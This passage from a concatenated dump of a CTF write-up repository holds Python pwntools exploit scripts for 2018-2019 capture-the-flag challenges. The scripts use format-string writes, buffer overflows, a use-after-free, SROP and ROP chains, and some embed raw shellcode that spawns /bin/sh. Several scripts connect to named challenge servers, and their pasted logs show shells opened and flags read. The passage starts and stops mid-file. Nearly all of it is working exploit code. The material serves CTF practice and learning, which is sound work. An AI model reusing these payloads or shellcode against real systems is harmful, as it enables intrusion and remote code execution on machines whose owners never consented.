libc: 0x76e11001 139 | [*] printf: 0x76e47fb5 140 | [*] system: 0x76e3d781 141 | [*] sh: 0x76edb3e4 142 | [*] Switching to interactive mode 143 | x�v$ 144 | $ cd /home/xmodem 145 | $ cat flag 146 | matesctf{xmodem_ma_de^_in_VietNam} 147 | $ id 148 | uid=1004(xmodem) gid=1004(xmodem) groups=1004(xmodem) 149 | $ 150 | """ -------------------------------------------------------------------------------- /2018/pragyan/aes_enc_unbf/aes_enc_unbf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/pragyan/aes_enc_unbf/aes_enc_unbf -------------------------------------------------------------------------------- /2018/pragyan/aes_enc_unbf/aes_enc_unbf.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def aes_enc_unbf(DEBUG): 6 | t = 0.3 7 | 8 | if DEBUG=="1": 9 | t = 0.005 10 | r = process("./aes_enc_unbf") 11 | raw_input("debug?") 12 | elif DEBUG=="2": 13 | HOST = '128.199.224.175' 14 | PORT = 33100 15 | r = remote(HOST,PORT) 16 | 17 | shellcode = "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x50\x50\x59\x5A\x89\xE3\x6A\x5B\x58\x34\x50\xCD\x80" 18 | __malloc_hook = 0x08230598 19 | __stack_prot = 0x0822EC98 20 | _libc_stack_end = 0x0822ECE8 21 | _dl_make_stack_executable = 0x081715D0 22 | main = 0x08048CE0 23 | pop_eax = 0x0804c906 24 | jmp_esp = 0x08174bec 25 | 26 | log.info('X: %#x' % (main>>16)) 27 | log.info('Y: %#x' % ((main&0xffff)-(main>>16))) 28 | fmt = "" 29 | fmt += p32(__stack_prot) 30 | fmt += p32(__malloc_hook+2) 31 | fmt += p32(__malloc_hook) 32 | fmt += "%7$n" 33 | fmt += "%" + str((main>>16) - 12) + "x" + "%8$hn" 34 | fmt += "%"+ str((main&0xffff)-((main>>16))) + "x" + "%9$hn" # *__malloc_hook = main 35 | fmt += "XXXX|%39$p|%41$p|YYYY" 36 | 37 | r.recvuntil("Enter message :- ") 38 | r.sendline(fmt) 39 | r.recvuntil("XXXX|") 40 | res = r.recvuntil("YYYY") 41 | address = res.split("|") 42 | canary = int(address[0],16) 43 | stack = int(address[1],16) 44 | log.info('canary: %#x' % canary) 45 | log.info('stack: %#x' % stack) 46 | 47 | fmt = "" 48 | fmt += p32(__stack_prot) 49 | fmt += "%259u"+"%7$hhn" # 0x822ec98 (__stack_prot) <- 0x7 50 | r.recvuntil("Enter message :- ") 51 | r.sendline(fmt) 52 | 53 | 54 | raw_input("?") 55 | fmt = "" 56 | fmt += p32(__malloc_hook) 57 | fmt += p32(__malloc_hook+1) 58 | fmt += p32(__malloc_hook+2) 59 | fmt += p32(__malloc_hook+3) 60 | fmt += "%"+str(0xff-15)+"u"+"%7$hhn" 61 | fmt += "%"+str(0x100)+"u"+"%8$hhn" 62 | fmt += "%"+str(0x200)+"u"+"%9$hhn" 63 | fmt += "%"+str(0x300)+"u"+"%10$hhn" # *__malloc_hook = 0 64 | fmt += "A"*0x43 65 | fmt += p32(canary) 66 | fmt += "B"*4 67 | fmt += p32(stack-0x5b8+4) 68 | fmt += p32(pop_eax) 69 | fmt += p32(_libc_stack_end) 70 | fmt += p32(_dl_make_stack_executable) 71 | fmt += p32(jmp_esp) 72 | fmt += shellcode 73 | r.recvuntil("Enter message :- ") 74 | r.sendline(fmt) 75 | r.interactive() 76 | 77 | aes_enc_unbf(sys.argv[1]) 78 | # pctf{th4t_m0m3n1-wh3n~f0rm41`SpiLls_0v3r} -------------------------------------------------------------------------------- /2018/pragyan/aes_enc_unbf/iv.aes: -------------------------------------------------------------------------------- 1 | DUMMYDUMMYDUMMYD -------------------------------------------------------------------------------- /2018/pragyan/aes_enc_unbf/key.aes: -------------------------------------------------------------------------------- 1 | DUMMYDUMMYDUMMYDUMMYDUMMYDUMMYDU -------------------------------------------------------------------------------- /2018/pragyan/police_academy/police_academy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/pragyan/police_academy/police_academy -------------------------------------------------------------------------------- /2018/pragyan/police_academy/police_academy.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def police_academy(DEBUG): 6 | t = 0.3 7 | 8 | if DEBUG=="1": 9 | t = 0.005 10 | r = process("./police_academy") 11 | raw_input("debug?") 12 | elif DEBUG=="2": 13 | HOST = '128.199.224.175' 14 | PORT = 13000 15 | r = remote(HOST,PORT) 16 | 17 | payload = "kaiokenx20\x00" 18 | payload += "A"*(0x10-len(payload)) 19 | payload += "./"*((0x24-8)/2) 20 | payload += "flag.txt" 21 | r.sendline(payload) 22 | r.sendline("8") 23 | r.interactive() 24 | 25 | police_academy(sys.argv[1]) 26 | # pctf{bUff3r-0v3Rfl0wS`4r3.alw4ys-4_cl4SsiC} -------------------------------------------------------------------------------- /2018/sunshinectf/Hexalicious/Hexalicious.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def hexalicious(DEBUG): 6 | if DEBUG=="1": 7 | r = process("./hexalicious") 8 | raw_input("debug?") 9 | elif DEBUG=="2": 10 | HOST = 'chal1.sunshinectf.org' 11 | PORT = 20003 12 | r = remote(HOST,PORT) 13 | # log.info('system: %#x' % system) 14 | FLAG = 0x0804B080 15 | 16 | # fmt = "%33$d" 17 | fmt = "%16$s" 18 | DATA = 0x0804B0E4 19 | r.recvuntil("Hello random stranger, what shall I call you?") 20 | r.sendline(fmt) 21 | flag = "" 22 | for i in xrange(10): 23 | data = p32(FLAG+8*i) 24 | data += p32(DATA) 25 | r.recvuntil("[>] ") 26 | r.sendline("0") 27 | r.recvuntil("[>] ") 28 | r.sendline(data) 29 | r.recvuntil("As hex, your data looks like this: ") 30 | r.recvuntil("0x") 31 | res = r.recvuntil("\n")[:-1] 32 | print res 33 | flag+=res.decode("hex")[::-1] 34 | print flag 35 | break 36 | 37 | r.interactive() 38 | 39 | hexalicious(sys.argv[1]) 40 | # sun{hexalicious_definitions_make_them_bytes_go_crazy} -------------------------------------------------------------------------------- /2018/sunshinectf/Hexalicious/flag.txt: -------------------------------------------------------------------------------- 1 | concavang 2 | -------------------------------------------------------------------------------- /2018/sunshinectf/Hexalicious/hexalicious: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/Hexalicious/hexalicious -------------------------------------------------------------------------------- /2018/sunshinectf/Hexalicious/libpwnableharness32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/Hexalicious/libpwnableharness32.so -------------------------------------------------------------------------------- /2018/sunshinectf/UAF/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/UAF/libc.so.6 -------------------------------------------------------------------------------- /2018/sunshinectf/UAF/libpwnableharness32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/UAF/libpwnableharness32.so -------------------------------------------------------------------------------- /2018/sunshinectf/UAF/uaf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/UAF/uaf -------------------------------------------------------------------------------- /2018/sunshinectf/UAF/uaf.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | import ctypes 5 | 6 | def uaf(DEBUG): 7 | if DEBUG=="1": 8 | r = process("./uaf") 9 | raw_input("debug?") 10 | elif DEBUG=="2": 11 | r = process("./uaf", env={"LD_PRELOAD":"./libc.so.6"}) 12 | raw_input("debug?") 13 | elif DEBUG=="3": 14 | HOST = 'chal1.sunshinectf.org' 15 | PORT = 20001 16 | r = remote(HOST,PORT) 17 | 18 | def create_array(array): 19 | r.sendline("1") 20 | r.recvuntil("How many integers?") 21 | r.sendline(str(len(array))) 22 | r.recvuntil(" integers:") 23 | r.sendline(" ".join(map(str,array))) 24 | r.recvuntil("ID of integer array: ") 25 | res = r.recvuntil("\n")[:-1] 26 | r.recvuntil("(>) ") 27 | return res 28 | 29 | def create_string(s): 30 | r.sendline("2") 31 | r.recvuntil("Enter a text string:") 32 | r.sendline(s) 33 | r.recvuntil("ID of text string: ") 34 | res = r.recvuntil("\n")[:-1] 35 | r.recvuntil("(>) ") 36 | return res 37 | 38 | def edit_array(addr, idx, new_value): 39 | r.sendline("3") 40 | r.recvuntil("Enter object ID:") 41 | r.sendline(str(addr)) 42 | r.recvuntil("Enter index to change:") 43 | r.sendline(str(idx)) 44 | r.recvuntil("Enter new value:") 45 | r.sendline(str(new_value)) 46 | r.recvuntil("(>) ") 47 | 48 | def show_array(addr): 49 | r.sendline("4") 50 | r.recvuntil("Enter object ID:") 51 | r.sendline(str(addr)) 52 | r.recvuntil("Integer array:\n") 53 | res = r.recvuntil("\n")[:-1] 54 | r.recvuntil("(>) ") 55 | return res 56 | 57 | def show_string(addr): 58 | r.sendline("5") 59 | r.recvuntil("Enter object ID:") 60 | r.sendline(str(addr)) 61 | r.recvuntil("Text string:\n") 62 | res = r.recvuntil("\n")[:-1] 63 | r.recvuntil("(>) ") 64 | return res 65 | 66 | def delete_array(addr): 67 | r.sendline("6") 68 | r.recvuntil("Enter object ID:") 69 | r.sendline(str(addr)) 70 | r.recvuntil("(>) ") 71 | 72 | def delete_string(addr): 73 | r.sendline("7") 74 | r.recvuntil("Enter object ID:") 75 | r.sendline(str(addr)) 76 | r.recvuntil("(>) ") 77 | 78 | size = 0x4 79 | strtol_got = 0x804A820 80 | strspn_got = 0x804a824 81 | strdup_got = 0x804A7F4 82 | free_got = 0x804a7f0 83 | arr1 = create_array([1]*0x11) 84 | arr1 = int(arr1) 85 | # print hex(arr1) 86 | arr2 = create_array([1]*0x11) 87 | arr2 = int(arr2) 88 | # print hex(arr2) 89 | 90 | str0 = create_string("/bin/sh") 91 | # print str0 92 | str1 = create_string("A"*size) 93 | # print hex(int(str1)) 94 | str2 = create_string("B"*size) 95 | str3 = create_string("C"*size) 96 | delete_string(str2) 97 | delete_string(str1) 98 | delete_string(str2) 99 | 100 | payload = p32(arr1-4) 101 | create_string(payload) 102 | create_string("E"*size) 103 | create_string("F"*size) 104 | payload = p32(strspn_got) 105 | 106 | create_string(payload) 107 | 108 | res = show_array(str(arr1)) 109 | # print res 110 | list_addr = res[1:-1].split(", ") 111 | # strtol =((0x800000000+(int(list_addr[0])>>8))&0xffffff)+0x7f000000 112 | # strtol = 0x800000000+int(list_addr[0]) 113 | strspn = 0x800000000+int(list_addr[0]) 114 | 115 | # print hex(strtol) 116 | # base_libc = strdup - 0x752a0 # libc-2.23.so 117 | # base_libc = free - 0x71470 # libc-2.23.so 118 | base_libc = strspn - 0x13df00 # libc-2.23.so 119 | # strspn = base_libc + 0x13df00 120 | calloc = base_libc + 0x71810 121 | system = base_libc + 0x3ada0 122 | log.info('base_libc: %#x' % base_libc) 123 | log.info('system: %#x' % system) 124 | # log.info('strtol: %#x' % strtol) 125 | log.info('strspn: %#x' % strspn) 126 | log.info('calloc: %#x' % calloc) 127 | delete_string(str1) 128 | delete_string(str2) 129 | delete_string(str1) 130 | payload = p32(arr2-4) 131 | create_string(payload) 132 | create_string("E"*size) 133 | create_string("F"*size) 134 | payload = p32(strspn_got+2) 135 | create_string(payload) 136 | raw_input("?") 137 | value = system&0xffff 138 | edit_array(arr1, 0, str(value)) 139 | value = ((calloc & 0xffff)*0x10000)+((system >> 2**4)&0xffff) 140 | # value = ((system >> 2**4)&0xffff) 141 | # print hex(calloc & 0xffff) 142 | print hex(value) 143 | edit_array(arr2, 0, str(value)) 144 | 145 | delete_string(str1) 146 | delete_string(str2) 147 | delete_string(str1) 148 | # raw_input("?") 149 | r.sendline("1") 150 | r.sendline("17") 151 | r.sendline("/bin/sh") 152 | 153 | r.interactive() 154 | 155 | uaf(sys.argv[1]) 156 | """ 157 | define ff 158 | telescope $ebp-0x1ac 2 159 | telescope $ebp-0x174 40 160 | fastbins 161 | end 162 | """ -------------------------------------------------------------------------------- /2018/sunshinectf/logsearch/.data: -------------------------------------------------------------------------------- 1 | concaheo 2 | -------------------------------------------------------------------------------- /2018/sunshinectf/logsearch/flag.txt: -------------------------------------------------------------------------------- 1 | sun{ahihi} 2 | -------------------------------------------------------------------------------- /2018/sunshinectf/logsearch/libpwnableharness32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/logsearch/libpwnableharness32.so -------------------------------------------------------------------------------- /2018/sunshinectf/logsearch/logs.txt: -------------------------------------------------------------------------------- 1 | concavang 2 | -------------------------------------------------------------------------------- /2018/sunshinectf/logsearch/logsearch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/logsearch/logsearch -------------------------------------------------------------------------------- /2018/sunshinectf/logsearch/logsearch.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def logsearch(DEBUG): 6 | if DEBUG=="1": 7 | r = process("./logsearch") 8 | raw_input("debug?") 9 | elif DEBUG=="2": 10 | HOST = 'chal1.sunshinectf.org' 11 | PORT = 20008 12 | r = remote(HOST,PORT) 13 | 14 | 15 | r.recvuntil("Enter a search phrase: ") 16 | puts_plt = 0x08048640 17 | fclose_got = 0x8049D44 18 | strstr_got = 0x8049D38 19 | search_file = 0x08049D7C 20 | handle_connection = 0x080488F4 21 | offset = 87 22 | payload = fmtstr_payload(offset, {fclose_got : handle_connection}, write_size="short") 23 | r.sendline(payload) 24 | raw_input("?") 25 | payload = fmtstr_payload(offset, {strstr_got: puts_plt, search_file: 0x67616c66, search_file+4: 0x7478742e}, write_size="short") 26 | r.sendline(payload) 27 | r.interactive() 28 | 29 | logsearch(sys.argv[1]) 30 | """ 31 | sun{**_********_**_hunter2} 32 | """ -------------------------------------------------------------------------------- /2018/sunshinectf/rot13/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/rot13/libc.so.6 -------------------------------------------------------------------------------- /2018/sunshinectf/rot13/libpwnableharness32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/rot13/libpwnableharness32.so -------------------------------------------------------------------------------- /2018/sunshinectf/rot13/rot13: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/sunshinectf/rot13/rot13 -------------------------------------------------------------------------------- /2018/sunshinectf/rot13/rot13.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def rot13(DEBUG): 6 | if DEBUG=="1": 7 | r = process("./rot13") 8 | raw_input("debug?") 9 | elif DEBUG=="2": 10 | HOST = 'chal1.sunshinectf.org' 11 | PORT = 20006 12 | r = remote(HOST,PORT) 13 | 14 | def r13(payload): 15 | return payload.encode("rot13") 16 | 17 | offset_strlen_got = 0x1fd4 18 | 19 | payload_leak = "|" 20 | payload_leak += "%"+str(0x153)+"$p" 21 | payload_leak += "|" 22 | payload_leak += "%"+str(0x15f)+"$p" 23 | payload_leak += "|" 24 | payload_leak = r13(payload_leak) 25 | 26 | r.recvuntil("Enter some text to be rot13 encrypted:") 27 | r.sendline(payload_leak) 28 | r.recvuntil("Rot13 encrypted data:") 29 | res = r.recvuntil("Enter some text to be rot13 encrypted:") 30 | leak = res.split("|") 31 | print leak 32 | 33 | codebase = int(leak[1],16)-0xa59 34 | __libc_start_main_ret = int(leak[2],16) 35 | base_libc = __libc_start_main_ret - 0x18637 # libc-2.23.so 36 | system = base_libc + 0x3ada0 37 | strlen_got = codebase + offset_strlen_got 38 | log.info('base_libc: %#x' % base_libc) 39 | log.info('system: %#x' % system) 40 | log.info('codebase: %#x' % codebase) 41 | log.info('strlen_got: %#x' % strlen_got) 42 | 43 | # raw_input("?") 44 | offset = 7 45 | payload = fmtstr_payload(offset, {strlen_got : system}, write_size="short") 46 | final_payload = payload 47 | final_payload = "" 48 | for i in payload: 49 | if ord(i) <= 128: 50 | final_payload += r13(i) 51 | else: 52 | final_payload += i 53 | r.sendline(final_payload) 54 | r.sendline("/bin/sh") 55 | 56 | r.interactive() 57 | 58 | rot13(sys.argv[1]) 59 | """ 60 | $ cat f* 61 | sun{q0hoy3_e0g13_1f_o3gg3e_gu4a_gu3_3a1tz4_z4pu1a3} 62 | """ -------------------------------------------------------------------------------- /2018/swampctf/Dungeon_Crawl/dungeon.py: -------------------------------------------------------------------------------- 1 | 2 | from pwn import * 3 | import time 4 | import sys 5 | 6 | def Dungeon(DEBUG): 7 | if DEBUG=="1": 8 | r = process("./level1") 9 | # r = process("./level5", env={"LD_PRELOAD":"./libc.so.6"}) 10 | raw_input("debug?") 11 | elif DEBUG=="2": 12 | HOST = 'chal1.swampctf.com' 13 | PORT = 1337 14 | r = remote(HOST,PORT) 15 | 16 | def level1(): 17 | r.recvuntil("Access token please: ") 18 | r.sendline(str(252534)) 19 | 20 | def level2(): 21 | r.recvuntil("What is your party name? ") 22 | payload = "A"*(0x88-0xC) 23 | payload += p32(0xCC07C9) 24 | r.sendline(payload) 25 | 26 | def level3(): 27 | goal = 0x0804862D 28 | r.recvuntil("Just a simple question...what is your favorite spell?") 29 | payload = "A"*0x84 30 | payload += "B"*4 31 | payload += p32(goal) 32 | r.sendline(payload) 33 | 34 | def level4(): 35 | goal = 0x0804A47C 36 | action = 73 37 | r.recvuntil("Choose an action: ") 38 | r.sendline(str(action)) 39 | r.recvuntil("Hey traveler, what is your name? ") 40 | payload = p32(goal)*(120/4) 41 | r.sendline(payload) 42 | 43 | def level5(): 44 | offset = 79 45 | offset2 = 105 46 | offset_one_gadget = 0xf1147 # execve("/bin/sh", rsp+0x70, environ) 47 | r.recvuntil("Choice [0 exit][1 small][2 large][3 format]: ") 48 | r.sendline("3") 49 | r.recvuntil("Path 3 - The possibilities are endless!\n") 50 | r.sendline("%71$p-%77$p-%79$p") 51 | res = r.recvline().replace("\n","").split("-") 52 | canary = int(res[0],16) 53 | __libc_start_main_ret = int(res[1],16) 54 | stack = int(res[2],16) 55 | base_libc = __libc_start_main_ret - 0x20830 56 | one_gadget = base_libc + offset_one_gadget 57 | log.info('canary: %#x' % canary) 58 | log.info('stack: %#x' % stack) 59 | log.info('stack rsp+0x70: %#x' % (stack-0x88)) 60 | log.info('__libc_start_main_ret: %#x' % __libc_start_main_ret) 61 | log.info('one_gadget: %#x' % one_gadget) 62 | log.info('base_libc: %#x' % base_libc) 63 | 64 | r.sendline("3") 65 | payload = "%"+str((stack-0x88)&0xffff)+"u"+"%"+str(offset)+"$hn" 66 | r.sendline(payload) 67 | 68 | r.sendline("3") 69 | payload = "%"+str(offset2)+"$n" 70 | r.sendline(payload) 71 | 72 | r.sendline("3") 73 | payload = "%"+str((stack-0x88+4)&0xffff)+"u"+"%"+str(offset)+"$hn" 74 | r.sendline(payload) 75 | 76 | r.sendline("3") 77 | payload = "%"+str(offset2)+"$n" 78 | r.sendline(payload) 79 | 80 | 81 | r.sendline("1") 82 | r.recvuntil("Path 1 - Give yourself an extra challenge :)\n") 83 | payload = "A"*(0x20-0x8) 84 | payload += p64(canary) 85 | payload += "B"*8 86 | payload += p64(one_gadget) 87 | payload += "\x00"*(0x40-len(payload)) 88 | r.send(payload) 89 | 90 | 91 | level1() 92 | level2() 93 | level3() 94 | level4() 95 | level5() 96 | r.interactive() 97 | 98 | Dungeon(sys.argv[1]) 99 | """ 100 | $ python dungeon.py 2 101 | [+] Opening connection to chal1.swampctf.com on port 1337: Done 102 | ['0xc89f1d1180b25600', '0x7f4d6f04a830', '0x7ffdb9001228'] 103 | [*] canary: 0xc89f1d1180b25600 104 | [*] stack: 0x7ffdb9001228 105 | [*] stack rsp+0x70: 0x7ffdb90011a0 106 | [*] __libc_start_main_ret: 0x7f4d6f04a830 107 | [*] one_gadget: 0x7f4d6f11b147 108 | [*] base_libc: 0x7f4d6f02a000 109 | [*] Switching to interactive mode 110 | $ id 111 | uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) 112 | $ ls 113 | flag 114 | level1 115 | level2 116 | level3 117 | level4 118 | level5 119 | $ cat f* 120 | flag{I_SurV1v3d_th3_f1n4l_b0ss} 121 | """ -------------------------------------------------------------------------------- /2018/swampctf/Dungeon_Crawl/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/swampctf/Dungeon_Crawl/libc.so.6 -------------------------------------------------------------------------------- /2018/swampctf/Power_QWORD/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/swampctf/Power_QWORD/libc.so.6 -------------------------------------------------------------------------------- /2018/swampctf/Power_QWORD/power: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/swampctf/Power_QWORD/power -------------------------------------------------------------------------------- /2018/swampctf/Power_QWORD/power.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def power(DEBUG): 6 | 7 | if DEBUG=="1": 8 | t = 0.005 9 | r = process("./power") 10 | raw_input("debug?") 11 | elif DEBUG=="2": 12 | r = process(['./power'], env={"LD_PRELOAD":"./libc.so.6"}) 13 | raw_input("debug?") 14 | elif DEBUG=="3": 15 | HOST = 'chal1.swampctf.com' 16 | PORT = 1999 17 | r = remote(HOST,PORT) 18 | 19 | shellcode64 = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 20 | offset_system = 0x45390 21 | offset_one_gadget = 0xf1147 # execve("/bin/sh", rsp+0x70, environ) 22 | 23 | r.recvuntil("Mage: Do you believe in such things? (yes/no): ") 24 | r.sendline("yes") 25 | r.recvuntil("0x") 26 | res= r.recv(12) 27 | system = int("0x"+res,16) 28 | one_gadget = system - offset_system + offset_one_gadget 29 | r.send(p64(one_gadget)) 30 | raw_input("?") 31 | r.sendline("A"*100) 32 | r.interactive() 33 | 34 | power(sys.argv[1]) 35 | """ 36 | $ python power.py 3 37 | [+] Opening connection to chal1.swampctf.com on port 1999: Done 38 | ? 39 | [*] Switching to interactive mode 40 | ] 41 | and speak the Power QWord: sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: not found 42 | $ id 43 | uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) 44 | $ ls 45 | flag 46 | power 47 | $ cat f* 48 | flag{m4g1c_1s_4ll_ar0Und_u5} 49 | """ -------------------------------------------------------------------------------- /2018/swampctf/Syscaller_Lament/syscaller: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/swampctf/Syscaller_Lament/syscaller -------------------------------------------------------------------------------- /2018/swampctf/Syscaller_Lament/syscaller.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | context.arch = "amd64" 5 | 6 | def syscaller(DEBUG): 7 | 8 | if DEBUG=="1": 9 | r = process("./syscaller") 10 | raw_input("debug?") 11 | elif DEBUG=="2": 12 | HOST = 'chal1.swampctf.com' 13 | PORT = 1800 14 | r = remote(HOST,PORT) 15 | 16 | sh = 0x400200 17 | _start = 0x4000E0 18 | syscall = 0x400104 19 | r.recvuntil("Hello and welcome to the Labyrinthe. Make your way or perish.") 20 | frame = SigreturnFrame() 21 | frame.rax = constants.SYS_mprotect 22 | frame.rdi = 0x400000 # address 23 | frame.rsi = 0x1000 # len 24 | frame.rdx = 7 # prot 25 | frame.rsp = sh 26 | frame.rip = syscall 27 | 28 | payload = p64(0x1) # r12 29 | payload += p64(0x2) # r11 30 | payload += p64(0x3) # rdi 31 | payload += p64(15) # rax = sys_sigreturn 32 | payload += p64(0x5) # rbx 33 | payload += p64(0x6) # rdx 34 | payload += p64(0x7) # rsi 35 | payload += p64(0x8) # rdi 36 | payload += str(frame) 37 | r.sendline(payload) 38 | sleep(2) 39 | payload = "/bin/sh\x00" #r12 40 | payload += p64(0) # r11 41 | payload += p64(0) # rdi 42 | payload += p64(59) # rax = sys_execve 43 | payload += p64(0) # rbx 44 | payload += p64(0) # rdx 45 | payload += p64(0) # rsi 46 | payload += p64(sh) # rdi 47 | r.sendline(payload) 48 | r.interactive() 49 | 50 | syscaller(sys.argv[1]) 51 | """ 52 | $ python syscaller.py 2 53 | [+] Opening connection to chal1.swampctf.com on port 1800: Done 54 | [*] Switching to interactive mode 55 | 56 | $ id 57 | uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) 58 | $ ls 59 | flag.txt 60 | syscaller 61 | $ cat f* 62 | flag{5me_5p3ls_R_m0r_pw3rfu1_th4n_0thrs} 63 | """ 64 | -------------------------------------------------------------------------------- /2019/Insomni'hack teaser 2019/onewrite/onewrite: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/Insomni'hack teaser 2019/onewrite/onewrite -------------------------------------------------------------------------------- /2019/Insomni'hack teaser 2019/onewrite/onewrite.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | if (sys.argv[1] == "local"): 6 | r = process("./onewrite") 7 | else: 8 | r = remote("onewrite.teaser.insomnihack.ch", 1337) 9 | 10 | def pause(s="pause!"): 11 | time.sleep(0.1) 12 | # raw_input(s) 13 | 14 | context.arch = "amd64" 15 | 16 | r.recvuntil(" > ") 17 | r.sendline("1") 18 | stack = int(r.recvline().strip(),16) 19 | log.info("stack: %s" % hex(stack)) 20 | 21 | r.recvuntil("address : ") 22 | r.send(str(stack+0x18)) 23 | r.recvuntil("data : ") 24 | r.send("\x04") 25 | pause() 26 | r.recvuntil(" > ") 27 | r.sendline("2") 28 | base_text = int(r.recvline().strip(),16) - 0x8A15 29 | log.info("base_text: %s" % hex(base_text)) 30 | 31 | do_leak = base_text + 0x8A15 32 | do_overwrite = base_text + 0x89C3 33 | main = base_text + 0x8B04 34 | 35 | r.recvuntil("address : ") 36 | r.send(str(stack+0x18)) # overwrite leak ret_addr 37 | r.recvuntil("data : ") 38 | r.send("\x04") 39 | pause() 40 | #=============================================== 41 | def overwrite(where,what): 42 | log.info("overwrite at %#x value %#x" % (where, what)) 43 | global stack 44 | r.recvuntil(" > ") 45 | 46 | r.send(p64(main)) 47 | 48 | r.recvuntil("address : ") 49 | r.send(str(stack-0x8)) #overwrite over ret_addr 50 | r.recvuntil("data : ") 51 | r.send(p64(main)) 52 | 53 | r.recvuntil(" > ") 54 | r.send(p64(0x4242424242424242)) 55 | 56 | r.recvuntil("address : ") 57 | r.send(str(stack-0x28)) #overwrite over ret_addr 58 | r.recvuntil("data : ") 59 | r.send(p64(do_overwrite)) 60 | r.recvuntil("address : ") 61 | r.send(str(where)) 62 | r.recvuntil("data : ") 63 | r.send(p64(what)) 64 | 65 | stack -= 0x28 66 | 67 | #============================================== 68 | _dl_make_stack_executable = base_text + 0x78190 69 | __stack_prot = base_text + 0x2B0D50 70 | _dl_pagesize = base_text + 0x2B2218 71 | pop_rax = base_text + 0x460ac # pop rax ; ret 72 | pop_rdx = base_text + 0x484c5 # pop rdx ; ret 73 | pop_rsi = base_text + 0xd9f2 # pop rsi ; ret 74 | pop_rdi = base_text + 0x84fa # pop rdi ; ret 75 | mov_dword_rdx_rax = base_text + 0x3ec74 # mov dword ptr [rdx], eax ; ret 76 | call_rsp = base_text + 0x5373d 77 | read = base_text + 0x460F0 78 | mprotect = base_text + 0x47070 79 | ret = base_text + 0x8B0E 80 | i = 8 81 | curr_stack = stack 82 | overwrite(curr_stack+i,pop_rdi); i+=8 83 | overwrite(curr_stack+i,0); i+=8 84 | overwrite(curr_stack+i,pop_rsi); i+=8 85 | overwrite(curr_stack+i,curr_stack+0x48); i+=8 86 | overwrite(curr_stack+i,pop_rdx); i+=8 87 | overwrite(curr_stack+i,0x100); i+=8 88 | overwrite(curr_stack+i,read); i+=8 89 | overwrite(curr_stack+i,ret); i+=8 90 | 91 | def back(curr_stack, address, value): 92 | r.recvuntil(" > ") 93 | r.send(p64(0x1234)) 94 | r.recvuntil("address : ") 95 | r.send(str(address)) #overwrite over ret_addr 96 | r.recvuntil("data : ") 97 | r.send(p64(value)) 98 | 99 | for i in xrange(stack+0x18, curr_stack-0x28, 0x28): 100 | # log.info("i: %#x" % i) 101 | back(curr_stack, i, ret) 102 | back(curr_stack, curr_stack-0x1000, ret) 103 | 104 | 105 | back(curr_stack, curr_stack-(0x330-20*0x28), ret) 106 | payload = p64(pop_rsi) 107 | payload += 